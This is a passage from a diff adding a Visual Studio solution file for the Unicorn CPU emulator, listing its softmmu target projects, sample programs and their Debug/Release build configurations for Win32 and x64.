"unicorn\sparc-softmmu\sparc-softmmu.vcxproj", "{698C2D54-475C-446F-B879-F629BBEF75FE}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sparc64-softmmu", "unicorn\sparc64-softmmu\sparc64-softmmu.vcxproj", "{8804AD29-E398-480C-AC0F-98EC1B7A51CB}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "x86_64-softmmu", "unicorn\x86_64-softmmu\x86_64-softmmu.vcxproj", "{17077E86-AE7C-41AF-86ED-2BAC03B019BC}" +EndProject +Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "samples", "samples", "{F8E85E25-4D67-4A6B-A976-C920790B8798}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mem_apis", "samples\mem_apis\mem_apis.vcxproj", "{9D588288-5A28-4AB3-96EA-442CAA508F8E}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_arm", "samples\sample_arm\sample_arm.vcxproj", "{9F32C692-9106-43AF-A291-779A2D8BE096}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_arm64", "samples\sample_arm64\sample_arm64.vcxproj", "{04DC0E3A-F247-45C2-AE27-8DE7493AA43B}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_batch_reg", "samples\sample_batch_reg\sample_batch_reg.vcxproj", "{7AA02EDF-D797-494B-929C-F628F4E4EA62}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_m68k", "samples\sample_m68k\sample_m68k.vcxproj", "{11727C54-463F-472A-88AF-6C3D6071BF0B}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_mips", "samples\sample_mips\sample_mips.vcxproj", "{E34ECD90-3977-4A4B-9641-4D7F1766E9FD}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_sparc", "samples\sample_sparc\sample_sparc.vcxproj", "{A25CA34D-2F64-442B-A5D3-B13CB56C9957}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_x86", "samples\sample_x86\sample_x86.vcxproj", "{F8053D66-8267-433A-BF2C-E07E2298C338}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_x86_32_gdt_and_seg_regs", "samples\sample_x86_32_gdt_and_seg_regs\sample_x86_32_gdt_and_seg_regs.vcxproj", "{9D96D09A-DE17-4011-9247-F0009E8D6DB5}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcode", "samples\shellcode\shellcode.vcxproj", "{F113B460-4B21-4014-9A15-D472FAA9E3F9}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_armeb", "samples\sample_armeb\sample_armeb.vcxproj", "{1945F27B-ABB3-47F9-9268-A42F73C8B992}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aarch64eb-softmmu", "unicorn\aarch64eb-softmmu\aarch64eb-softmmu.vcxproj", "{340D86A5-E53C-490B-880A-8EB1F5BDE947}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_arm64eb", "samples\sample_arm64eb\sample_arm64eb.vcxproj", "{1A42A5E3-82A7-4EE4-B7D2-8265B147F124}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|Win32.ActiveCfg = Debug|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|Win32.Build.0 = Debug|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|x64.ActiveCfg = Debug|x64 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|x64.Build.0 = Debug|x64 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|Win32.ActiveCfg = Release|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|Win32.Build.0 = Release|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|x64.ActiveCfg = Release|x64 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|x64.Build.0 = Release|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|Win32.ActiveCfg = Debug|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|Win32.Build.0 = Debug|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|x64.ActiveCfg = Debug|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|x64.Build.0 = Debug|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|Win32.ActiveCfg = Release|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|Win32.Build.0 = Release|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|x64.ActiveCfg = Release|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|x64.Build.0 = Release|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|Win32.ActiveCfg = Debug|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|Win32.Build.0 = Debug|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|x64.ActiveCfg = Debug|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|x64.Build.0 = Debug|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|Win32.ActiveCfg = Release|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|Win32.Build.0 = Release|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|x64.ActiveCfg = Release|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|x64.Build.0 = Release|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|Win32.ActiveCfg = Debug|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|Win32.Build.0 = Debug|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|x64.ActiveCfg = Debug|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|x64.Build.0 = Debug|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|Win32.ActiveCfg = Release|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|Win32.Build.0 = Release|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|x64.ActiveCfg = Release|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|x64.Build.0 = Release|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|Win32.ActiveCfg = Debug|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|Win32.Build.0 = Debug|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|x64.ActiveCfg = Debug|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|x64.Build.0 = Debug|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|Win32.ActiveCfg = Release|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|Win32.Build.0 = Release|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|x64.ActiveCfg = Release|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|x64.Build.0 = Release|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|Win32.ActiveCfg = Debug|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|Win32.Build.0 = Debug|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|x64.ActiveCfg = Debug|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|x64.Build.0 = Debug|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|Win32.ActiveCfg = Release|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|Win32.Build.0 = Release|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|x64.ActiveCfg = Release|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|x64.Build.0 = Release|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|Win32.ActiveCfg = Debug|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|Win32.Build.0 = Debug|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|x64.ActiveCfg = Debug|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|x64.Build.0 = Debug|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|Win32.ActiveCfg = Release|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|Win32.Build.0 = Release|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|x64.ActiveCfg = Release|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|x64.Build.0 = Release|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|Win32.ActiveCfg = Debug|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|Win32.Build.0 = Debug|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|x64.ActiveCfg = Debug|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|x64.Build.0 = Debug|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|Win32.ActiveCfg = Release|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|Win32.Build.0 = Release|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|x64.ActiveCfg = Release|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|x64.Build.0 = Release|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|Win32.ActiveCfg = Debug|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|Win32.Build.0 = Debug|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|x64.ActiveCfg = Debug|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|x64.Build.0 = Debug|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|Win32.ActiveCfg = Release|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|Win32.Build.0 = Release|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|x64.ActiveCfg = Release|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|x64.Build.0 = Release|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|Win32.ActiveCfg = Debug|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|Win32.Build.0 = Debug|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|x64.ActiveCfg = Debug|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|x64.Build.0 = Debug|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|Win32.ActiveCfg = Release|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|Win32.Build.0 = Release|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|x64.ActiveCfg = Release|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|x64.Build.0 = Release|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|Win32.ActiveCfg = Debug|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|Win32.Build.0 = Debug|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|x64.ActiveCfg = Debug|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|x64.Build.0 = Debug|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|Win32.ActiveCfg = Release|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|Win32.Build.0 = Release|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|x64.ActiveCfg = Release|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|x64.Build.0 = Release|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|Win32.ActiveCfg = Debug|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|Win32.Build.0 = Debug|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|x64.ActiveCfg = Debug|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|x64.Build.0 = Debug|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|Win32.ActiveCfg = Release|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|Win32.Build.0 = Release|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|x64.ActiveCfg = Release|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|x64.Build.0 = Release|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|Win32.ActiveCfg = Debug|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|Win32.Build.0 = Debug|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|x64.ActiveCfg = Debug|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|x64.Build.0 = Debug|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|Win32.ActiveCfg = Release|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|Win32.Build.0 = Release|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|x64.ActiveCfg = Release|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|x64.Build.0 = Release|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|Win32.ActiveCfg = Debug|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|Win32.Build.0 = Debug|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|x64.ActiveCfg = Debug|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|x64.Build.0 = Debug|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|Win32.ActiveCfg = Release|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|Win32.Build.0 = Release|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|x64.ActiveCfg = Release|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|x64.Build.0 = Release|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|Win32.ActiveCfg = Debug|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|Win32.Build.0 = Debug|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|x64.ActiveCfg = Debug|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|x64.Build.0 = Debug|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|Win32.ActiveCfg = Release|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|Win32.Build.0 = Release|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|x64.ActiveCfg = Release|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|x64.Build.0 = Release|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|Win32.ActiveCfg = Debug|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|Win32.Build.0 = Debug|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|x64.ActiveCfg = Debug|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|x64.Build.0 = Debug|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|Win32.ActiveCfg = Release|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|Win32.Build.0 = Release|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|x64.ActiveCfg = Release|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|x64.Build.0 = Release|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|Win32.ActiveCfg = Debug|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|Win32.Build.0 = Debug|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|x64.ActiveCfg = Debug|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|x64.Build.0 = Debug|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|Win32.ActiveCfg = Release|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|Win32.Build.0 = Release|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|x64.ActiveCfg = Release|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|x64.Build.0 = Release|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|Win32.ActiveCfg = Debug|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|Win32.Build.0 = Debug|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|x64.ActiveCfg = Debug|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|x64.Build.0 = Debug|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|Win32.ActiveCfg = Release|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|Win32.Build.0 = Release|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|x64.ActiveCfg = Release|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|x64.Build.0 = Release|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|Win32.ActiveCfg = Debug|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|Win32.Build.0 = Debug|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|x64.ActiveCfg = Debug|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|x64.Build.0 = Debug|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|Win32.ActiveCfg = Release|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|Win32.Build.0 = Release|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|x64.ActiveCfg = Release|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|x64.Build.0 = Release|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|Win32.ActiveCfg = Debug|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|Win32.Build.0 = Debug|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|x64.ActiveCfg = Debug|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|x64.Build.0 = Debug|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|Win32.ActiveCfg = Release|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|Win32.Build.0 = Release|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|x64.ActiveCfg = Release|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|x64.Build.0 = Release|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|Win32.ActiveCfg = Debug|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|Win32.Build.0 = Debug|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|x64.ActiveCfg = Debug|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|x64.Build.0 = Debug|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|Win32.ActiveCfg = Release|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|Win32.Build.0 = Release|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|x64.ActiveCfg = Release|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Release|x64.Build.0 = Release|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|Win32.ActiveCfg = Debug|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|Win32.Build.0 = Debug|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|x64.ActiveCfg = Debug|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Debug|x64.Build.0 = Debug|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|Win32.ActiveCfg = Release|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|Win32.Build.0 = Release|Win32 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|x64.ActiveCfg = Release|x64 + {9D96D09A-DE17-4011-9247-F0009E8D6DB5}.Release|x64.Build.0 = Release|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|Win32.ActiveCfg = Debug|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|Win32.Build.0 = Debug|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|x64.ActiveCfg = Debug|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Debug|x64.Build.0 = Debug|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|Win32.ActiveCfg = Release|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|Win32.Build.0 = Release|Win32 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|x64.ActiveCfg = Release|x64 + {F113B460-4B21-4014-9A15-D472FAA9E3F9}.Release|x64.Build.0 = Release|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|Win32.ActiveCfg = Debug|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|Win32.Build.0 = Debug|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|x64.ActiveCfg = Debug|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Debug|x64.Build.0 = Debug|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|Win32.ActiveCfg = Release|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|Win32.Build.0 = Release|Win32 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|x64.ActiveCfg = Release|x64 + {1945F27B-ABB3-47F9-9268-A42F73C8B992}.Release|x64.Build.0 = Release|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|Win32.ActiveCfg = Debug|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|Win32.Build.0 = Debug|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|x64.ActiveCfg = Debug|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Debug|x64.Build.0 = Debug|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|Win32.ActiveCfg = Release|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|Win32.Build.0 = Release|Win32 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|x64.ActiveCfg = Release|x64 + {340D86A5-E53C-490B-880A-8EB1F5BDE947}.Release|x64.Build.0 = Release|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|Win32.ActiveCfg = Debug|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|Win32.Build.0 = Debug|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|x64.ActiveCfg = Debug|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Debug|x64.Build.0 = Debug|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|Win32.ActiveCfg = Release|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|Win32.Build.0 = Release|Win32 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|x64.ActiveCfg = Release|x64 + {1A42A5E3-82A7-4EE4-B7D2-8265B147F124}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(NestedProjects) = preSolution + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {740F3007-7BF0-4C0C-8FA5-2587C794EF31} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {2C5AD347-6E34-463B-8289-00578E43B255} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {63050112-E486-4396-B5E4-303C3BC12D39} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {4A9F9353-DB63-460A-BB1C-9CB519DFD414} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {4478909E-6983-425C-9D9F-558CF258E61E} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {006A7908-ABF3-4D18-BC35-0A29E39B95F9} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {698C2D54-475C-446F-B879-F629BBEF75FE} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {8804AD29-E398-480C-AC0F-98EC1B7A51CB} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {17077E86-AE7C-41AF-86ED-2BAC03B019BC} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {340D86A5-E53C-490B-880A-8EB1F5BDE947} = {857A09AF-FE20-461C-B66F-D779422AD46B} + {9D588288-5A28-4AB3-96EA-442CAA508F8E} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {9F32C692-9106-43AF-A291-779A2D8BE096} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {7AA02EDF-D797-494B-929C-F628F4E4EA62} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {11727C54-463F-472A-88AF-6C3D6071BF0B} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {A25CA34D-2F64-442B-A5D3-B13CB56C9957} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {F8053D66-8267-433A-BF2C-E07E2298C338} = {F8E85E25-4D67-4A6B-A976-C920790B8798} + {9D96D09A-DE17-4011-9247-F0009E8D6DB5} = 